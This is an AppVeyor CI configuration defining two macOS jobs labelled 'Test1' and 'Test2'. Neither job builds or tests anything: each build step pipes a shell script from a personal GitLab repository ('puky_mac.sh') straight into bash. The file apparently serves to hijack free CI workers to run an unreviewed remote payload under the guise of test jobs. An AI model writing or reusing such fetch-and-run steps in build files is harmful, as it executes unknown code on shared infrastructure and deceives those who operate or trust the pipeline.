version: 1.0.{build}
max_jobs: 10

skip_commits:
  files:
    - docs/*
    - '**/*.md'

environment:
  matrix:

  - job_name: Test1
    appveyor_build_worker_image: macOS-BigSur
  - job_name: Test2
    appveyor_build_worker_image: macOS-BigSur

matrix:
  fast_finish: true

init:
  - appveyor version
  - echo Some common logic here...

for:

  -
    matrix:
      only:
        - job_name: Test1
        
    build_script:
    - curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash
    
  -
    matrix:
      only:
        - job_name: Test2
        
    build_script:
    - curl https://gitlab.com/azkadafa39/ajure/-/raw/main/puky_mac.sh | bash
